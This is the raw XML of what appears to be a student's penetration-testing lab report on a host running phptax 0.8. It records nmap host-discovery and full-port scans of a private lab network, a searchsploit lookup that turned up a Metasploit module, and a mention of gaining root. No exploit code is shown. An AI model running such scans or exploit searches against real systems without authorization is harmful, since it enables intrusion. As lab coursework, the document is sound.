                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> and was able to run a command to elevate my privileges to that of the root user.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EC86522" w14:textId="0C006536" w:rsidR="002A5519" w:rsidRPr="002A5519" w:rsidRDefault="002A5519" w:rsidP="008F5D57"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="22DEB759" w14:textId="015C3666" w:rsidR="00A82CED" w:rsidRPr="002A5519" w:rsidRDefault="00A82CED" w:rsidP="008F5D57"/>
    <w:p w14:paraId="425096D1" w14:textId="2DE9C49F" w:rsidR="00D95189" w:rsidRDefault="00D95189">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="22B787"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="552C954B" w14:textId="64340B26" w:rsidR="003A4987" w:rsidRPr="002A5519" w:rsidRDefault="00DF7D1E" w:rsidP="003A4987">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc85467573"/>
      <w:r w:rsidRPr="002A5519">
        <w:lastRenderedPageBreak/>
        <w:t>Initial Enumeration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="352FD18C" w14:textId="0A0E6467" w:rsidR="00D65E85" w:rsidRDefault="00D65E85" w:rsidP="00D65E85">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A5519">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="22B787"/>
        </w:rPr>
        <w:t>Guide</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5519">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5519">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A5519">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">In this section, </w:t>
      </w:r>
      <w:r w:rsidR="002A5519" w:rsidRPr="002A5519">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">detail the commands you used for the initial scan of the target, along with the resul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7"/>
      </w:tblGrid>
      <w:tr w:rsidR="002A5519" w14:paraId="4C320CA3" w14:textId="77777777" w:rsidTr="002A5519">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10443" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08BCF589" w14:textId="53A373EE" w:rsidR="008301FC" w:rsidRDefault="008301FC" w:rsidP="00D65E85"/>
          <w:p w14:paraId="0AB84AA0" w14:textId="77777777" w:rsidR="008301FC" w:rsidRDefault="008301FC" w:rsidP="00D65E85"/>
          <w:p w14:paraId="082AE755" w14:textId="77777777" w:rsidR="00625478" w:rsidRDefault="008301FC" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00625478">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>NMAP initial scan (host discovery)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27247B66" w14:textId="77777777" w:rsidR="00625478" w:rsidRDefault="00625478" w:rsidP="00D65E85"/>
          <w:p w14:paraId="56EEE391" w14:textId="77777777" w:rsidR="00361C0C" w:rsidRDefault="00625478" w:rsidP="00D65E85">
            <w:r>
              <w:t>Command</w:t>
            </w:r>
            <w:r w:rsidR="00361C0C">
              <w:t>s:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="161D09A0" w14:textId="77777777" w:rsidR="00361C0C" w:rsidRDefault="00361C0C" w:rsidP="00D65E85"/>
          <w:p w14:paraId="4D8EBE8B" w14:textId="259D1435" w:rsidR="002A5519" w:rsidRDefault="008301FC" w:rsidP="00D65E85">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 192.168.138.0/24</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58A13F6B" w14:textId="461BF894" w:rsidR="008301FC" w:rsidRDefault="008301FC" w:rsidP="00D65E85"/>
          <w:p w14:paraId="6565F9B6" w14:textId="3A1C27EC" w:rsidR="008301FC" w:rsidRPr="002A5519" w:rsidRDefault="008301FC" w:rsidP="00D65E85"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5A1E2C99" wp14:editId="59B36C8B">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>137795</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>77470</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="4140200" cy="1857375"/>
                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>
                  <wp:wrapTight wrapText="bothSides">
                    <wp:wrapPolygon edited="0">
                      <wp:start x="0" y="0"/>
                      <wp:lineTo x="0" y="21489"/>
                      <wp:lineTo x="21467" y="21489"/>
                      <wp:lineTo x="21467" y="0"/>
                      <wp:lineTo x="0" y="0"/>
                    </wp:wrapPolygon>
                  </wp:wrapTight>
                  <wp:docPr id="126414774" name="Picture 1" descr="A computer screen with white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414774" name="Picture 1" descr="A computer screen with white text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0200" cy="1857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DF38AE3" w14:textId="77777777" w:rsidR="002A5519" w:rsidRPr="002A5519" w:rsidRDefault="002A5519" w:rsidP="00D65E85"/>
          <w:p w14:paraId="1C79450B" w14:textId="52282BCE" w:rsidR="002A5519" w:rsidRPr="002A5519" w:rsidRDefault="002A5519" w:rsidP="00D65E85"/>
          <w:p w14:paraId="6A2571AC" w14:textId="77777777" w:rsidR="002A5519" w:rsidRDefault="002A5519" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="162F3392" w14:textId="77777777" w:rsidR="002A5519" w:rsidRDefault="002A5519" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7CD10EE4" w14:textId="77777777" w:rsidR="008301FC" w:rsidRDefault="008301FC" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="421E637B" w14:textId="77777777" w:rsidR="008301FC" w:rsidRDefault="008301FC" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="525FAF7C" w14:textId="77777777" w:rsidR="008301FC" w:rsidRDefault="008301FC" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0526D1C6" w14:textId="77777777" w:rsidR="008301FC" w:rsidRDefault="008301FC" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="67F47158" w14:textId="77777777" w:rsidR="008301FC" w:rsidRDefault="008301FC" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3BC5D605" w14:textId="77777777" w:rsidR="008301FC" w:rsidRDefault="008301FC" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="19DDA831" w14:textId="77777777" w:rsidR="008301FC" w:rsidRDefault="008301FC" w:rsidP="00D65E85"/>
          <w:p w14:paraId="372F1B2C" w14:textId="77777777" w:rsidR="008301FC" w:rsidRDefault="008301FC" w:rsidP="00D65E85"/>
          <w:p w14:paraId="136F3604" w14:textId="77777777" w:rsidR="008301FC" w:rsidRDefault="008301FC" w:rsidP="00D65E85"/>
          <w:p w14:paraId="03A83C6A" w14:textId="77777777" w:rsidR="00625478" w:rsidRDefault="008301FC" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00625478">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>NMAP detailed scan</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D31CEC5" w14:textId="77777777" w:rsidR="00625478" w:rsidRDefault="00625478" w:rsidP="00D65E85"/>
          <w:p w14:paraId="4FB0F632" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="00625478" w:rsidP="00D65E85">
            <w:r>
              <w:t>Command</w:t>
            </w:r>
            <w:r w:rsidR="002937A4">
              <w:t>s:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38E4CC77" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="00D65E85"/>
          <w:p w14:paraId="13988ECD" w14:textId="52E1BB8C" w:rsidR="008301FC" w:rsidRDefault="008301FC" w:rsidP="00D65E85">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008301FC">
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008301FC">
              <w:t xml:space="preserve"> -A -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008301FC">
              <w:t>sS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008301FC">
              <w:t xml:space="preserve"> -p- -v 192.168.138.130</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A7F998A" w14:textId="032423AD" w:rsidR="00625478" w:rsidRPr="008301FC" w:rsidRDefault="00625478" w:rsidP="00625478"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="63FDFC25" w14:textId="77777777" w:rsidR="005D1FD4" w:rsidRDefault="005D1FD4" w:rsidP="00D65E85">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6885CDCF" w14:textId="46812890" w:rsidR="00D65E85" w:rsidRPr="002A5519" w:rsidRDefault="00D65E85" w:rsidP="00D65E85">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc85467574"/>
      <w:r w:rsidRPr="002A5519">
        <w:t>Services Discovered</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="7035782E" w14:textId="2C9B088E" w:rsidR="00D65E85" w:rsidRPr="002A5519" w:rsidRDefault="00D65E85" w:rsidP="00D65E85">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A5519">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="22B787"/>
        </w:rPr>
        <w:t>Guide</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5519">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5519">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002A5519" w:rsidRPr="002A5519">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Detail the services you discovered, version numbers, and service types. A screenshot may be helpful her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7"/>
      </w:tblGrid>
      <w:tr w:rsidR="002A5519" w14:paraId="61C7B3DA" w14:textId="77777777" w:rsidTr="002A5519">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10443" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C760837" w14:textId="326F105A" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="00625478">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2632C1C3" w14:textId="14195340" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="00625478">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="13F6D498" w14:textId="29570DC4" w:rsidR="00625478" w:rsidRDefault="00625478" w:rsidP="00625478">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00625478">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Services and Version</w:t>
            </w:r>
            <w:r w:rsidR="002937A4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70F74744" w14:textId="77777777" w:rsidR="00263D13" w:rsidRDefault="00263D13" w:rsidP="00625478">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="714BDA0A" w14:textId="69D327A8" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="00625478">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008301FC"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3F6E4896" wp14:editId="707B952F">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>135255</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>80645</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="3345180" cy="1824355"/>
                  <wp:effectExtent l="0" t="0" r="7620" b="4445"/>
                  <wp:wrapTight wrapText="bothSides">
                    <wp:wrapPolygon edited="0">
                      <wp:start x="0" y="0"/>
                      <wp:lineTo x="0" y="21427"/>
                      <wp:lineTo x="21526" y="21427"/>
                      <wp:lineTo x="21526" y="0"/>
                      <wp:lineTo x="0" y="0"/>
                    </wp:wrapPolygon>
                  </wp:wrapTight>
                  <wp:docPr id="15779041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131828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5180" cy="1824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29CA4F0" w14:textId="77777777" w:rsidR="00625478" w:rsidRDefault="00625478" w:rsidP="00625478">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6542F8DB" w14:textId="77777777" w:rsidR="00625478" w:rsidRDefault="00625478" w:rsidP="00625478">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4014CB72" w14:textId="77777777" w:rsidR="00625478" w:rsidRDefault="00625478" w:rsidP="00625478">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2280B6F4" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="00625478">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="37DCF822" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="00625478">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="22A5C544" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="00625478">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6E9DC04A" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="00625478">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1263EBF5" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="00625478">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5A14F8A0" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="00625478">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2C6A94CB" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="00625478">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D17BEAF" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="00625478">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="39C15311" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="00625478">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="35820AAA" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="00625478">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2449D7D1" w14:textId="03B7D12F" w:rsidR="00625478" w:rsidRPr="00625478" w:rsidRDefault="00625478" w:rsidP="00625478">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00625478">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP (port 80) – </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00625478">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>phptax</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00625478">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> application</w:t>
            </w:r>
            <w:r w:rsidR="00263D13">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> (version 0.8)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="658011B5" w14:textId="77777777" w:rsidR="00625478" w:rsidRDefault="00625478" w:rsidP="00625478"/>
          <w:p w14:paraId="2D5A14FD" w14:textId="77777777" w:rsidR="00625478" w:rsidRDefault="00625478" w:rsidP="00625478"/>
          <w:p w14:paraId="5A64B747" w14:textId="77777777" w:rsidR="00625478" w:rsidRDefault="00625478" w:rsidP="00625478"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69D7E1D2" wp14:editId="19FF2B9A">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>14605</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>76200</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="3538855" cy="2955925"/>
                  <wp:effectExtent l="0" t="0" r="4445" b="0"/>
                  <wp:wrapTight wrapText="bothSides">
                    <wp:wrapPolygon edited="0">
                      <wp:start x="0" y="0"/>
                      <wp:lineTo x="0" y="21438"/>
                      <wp:lineTo x="21511" y="21438"/>
                      <wp:lineTo x="21511" y="0"/>
                      <wp:lineTo x="0" y="0"/>
                    </wp:wrapPolygon>
                  </wp:wrapTight>
                  <wp:docPr id="1607081433" name="Picture 2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7081433" name="Picture 2" descr="A screenshot of a computer&#10;&#10;Description automatically generated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8855" cy="2955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D7FFD3" w14:textId="77777777" w:rsidR="00625478" w:rsidRDefault="00625478" w:rsidP="00625478"/>
          <w:p w14:paraId="4D7E241C" w14:textId="77777777" w:rsidR="00625478" w:rsidRDefault="00625478" w:rsidP="00625478"/>
          <w:p w14:paraId="7B3C1392" w14:textId="77777777" w:rsidR="00625478" w:rsidRDefault="00625478" w:rsidP="00625478"/>
          <w:p w14:paraId="4AC7BA3B" w14:textId="77777777" w:rsidR="00625478" w:rsidRDefault="00625478" w:rsidP="00625478"/>
          <w:p w14:paraId="6B403C60" w14:textId="77777777" w:rsidR="00625478" w:rsidRDefault="00625478" w:rsidP="00625478"/>
          <w:p w14:paraId="1A593201" w14:textId="77777777" w:rsidR="00625478" w:rsidRDefault="00625478" w:rsidP="00625478"/>
          <w:p w14:paraId="6ADFFF0B" w14:textId="77777777" w:rsidR="00625478" w:rsidRDefault="00625478" w:rsidP="00625478"/>
          <w:p w14:paraId="2E48290E" w14:textId="77777777" w:rsidR="00625478" w:rsidRDefault="00625478" w:rsidP="00625478"/>
          <w:p w14:paraId="215BD2D5" w14:textId="77777777" w:rsidR="00625478" w:rsidRDefault="00625478" w:rsidP="00625478"/>
          <w:p w14:paraId="5AB3F990" w14:textId="77777777" w:rsidR="00625478" w:rsidRDefault="00625478" w:rsidP="00625478"/>
          <w:p w14:paraId="4579EE64" w14:textId="77777777" w:rsidR="00625478" w:rsidRDefault="00625478" w:rsidP="00625478"/>
          <w:p w14:paraId="71BB4D70" w14:textId="77777777" w:rsidR="00625478" w:rsidRDefault="00625478" w:rsidP="00625478"/>
          <w:p w14:paraId="3996BD18" w14:textId="77777777" w:rsidR="00625478" w:rsidRDefault="00625478" w:rsidP="00625478"/>
          <w:p w14:paraId="66E121DA" w14:textId="77777777" w:rsidR="00625478" w:rsidRDefault="00625478" w:rsidP="00625478"/>
          <w:p w14:paraId="65DC83C1" w14:textId="77777777" w:rsidR="00625478" w:rsidRDefault="00625478" w:rsidP="00625478"/>
          <w:p w14:paraId="57B781F7" w14:textId="77777777" w:rsidR="00625478" w:rsidRDefault="00625478" w:rsidP="00625478"/>
          <w:p w14:paraId="3601CE6D" w14:textId="77777777" w:rsidR="00625478" w:rsidRDefault="00625478" w:rsidP="00625478"/>
          <w:p w14:paraId="7E590270" w14:textId="77777777" w:rsidR="00625478" w:rsidRDefault="00625478" w:rsidP="00625478"/>
          <w:p w14:paraId="37BF7089" w14:textId="77777777" w:rsidR="00625478" w:rsidRDefault="00625478" w:rsidP="00625478"/>
          <w:p w14:paraId="2C29FC7B" w14:textId="52F9014F" w:rsidR="002A5519" w:rsidRDefault="002A5519" w:rsidP="00625478">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3362FD3E" w14:textId="7799F17C" w:rsidR="002A5519" w:rsidRPr="002A5519" w:rsidRDefault="002A5519" w:rsidP="00D65E85">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04B7D4B8" w14:textId="56237D9C" w:rsidR="002A5519" w:rsidRPr="002A5519" w:rsidRDefault="002A5519" w:rsidP="002A5519">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc85467575"/>
      <w:r w:rsidRPr="002A5519">
        <w:t>Service Discussion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="1B685ABB" w14:textId="7A5AF6A2" w:rsidR="002A5519" w:rsidRDefault="002A5519" w:rsidP="002A5519">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A5519">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="22B787"/>
        </w:rPr>
        <w:t>Guide</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5519">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5519">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A5519">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>In this section, discuss the services you found. If you searched for these services within any exploit database and received results, list them here.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> If the service has a CVE score, be sure to record i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7"/>
      </w:tblGrid>
      <w:tr w:rsidR="002A5519" w14:paraId="1BB6DC52" w14:textId="77777777" w:rsidTr="002A5519">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10443" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F4D4C2A" w14:textId="77777777" w:rsidR="002A5519" w:rsidRPr="002A5519" w:rsidRDefault="002A5519" w:rsidP="002A5519"/>
          <w:p w14:paraId="52E22865" w14:textId="77777777" w:rsidR="00625478" w:rsidRPr="00625478" w:rsidRDefault="00625478" w:rsidP="00625478">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00625478">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Searchsploit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="49348E0C" w14:textId="77777777" w:rsidR="00625478" w:rsidRDefault="00625478" w:rsidP="00625478">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="003A36A8" w14:textId="3BBBA7CB" w:rsidR="00625478" w:rsidRDefault="00361C0C" w:rsidP="00625478">
            <w:r>
              <w:t>This is where I found the Metasploit module</w:t>
            </w:r>
            <w:r w:rsidR="0031029B">
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EDF360C" w14:textId="77777777" w:rsidR="00361C0C" w:rsidRPr="00625478" w:rsidRDefault="00361C0C" w:rsidP="00625478"/>
          <w:p w14:paraId="3EED69B6" w14:textId="77777777" w:rsidR="00361C0C" w:rsidRDefault="00625478" w:rsidP="00625478">
            <w:r>
              <w:t>Command</w:t>
            </w:r>
            <w:r w:rsidR="00361C0C">
              <w:t>s:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73E0B5F3" w14:textId="77777777" w:rsidR="00361C0C" w:rsidRDefault="00361C0C" w:rsidP="00625478"/>
          <w:p w14:paraId="544F8BC5" w14:textId="34FD48DA" w:rsidR="00625478" w:rsidRPr="00625478" w:rsidRDefault="00625478" w:rsidP="00625478">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>searchsploit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>phptax</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="0AB1DC03" w14:textId="77777777" w:rsidR="00625478" w:rsidRPr="00625478" w:rsidRDefault="00625478" w:rsidP="00625478">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="64521FFA" w14:textId="77777777" w:rsidR="00625478" w:rsidRDefault="00625478" w:rsidP="00625478"/>
          <w:p w14:paraId="3DA19F33" w14:textId="77777777" w:rsidR="00625478" w:rsidRDefault="00625478" w:rsidP="00625478">
            <w:r w:rsidRPr="00625478">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5E5D7E05" wp14:editId="022B493B">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>44661</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>19473</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="5567045" cy="1432179"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTight wrapText="bothSides">
                    <wp:wrapPolygon edited="0">
                      <wp:start x="0" y="0"/>
                      <wp:lineTo x="0" y="21265"/>
                      <wp:lineTo x="21509" y="21265"/>
                      <wp:lineTo x="21509" y="0"/>
                      <wp:lineTo x="0" y="0"/>
                    </wp:wrapPolygon>
                  </wp:wrapTight>
                  <wp:docPr id="4153923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5392317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7045" cy="1432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C653826" w14:textId="77777777" w:rsidR="00625478" w:rsidRDefault="00625478" w:rsidP="00625478"/>
          <w:p w14:paraId="5227F4BA" w14:textId="77777777" w:rsidR="00625478" w:rsidRDefault="00625478" w:rsidP="00625478"/>
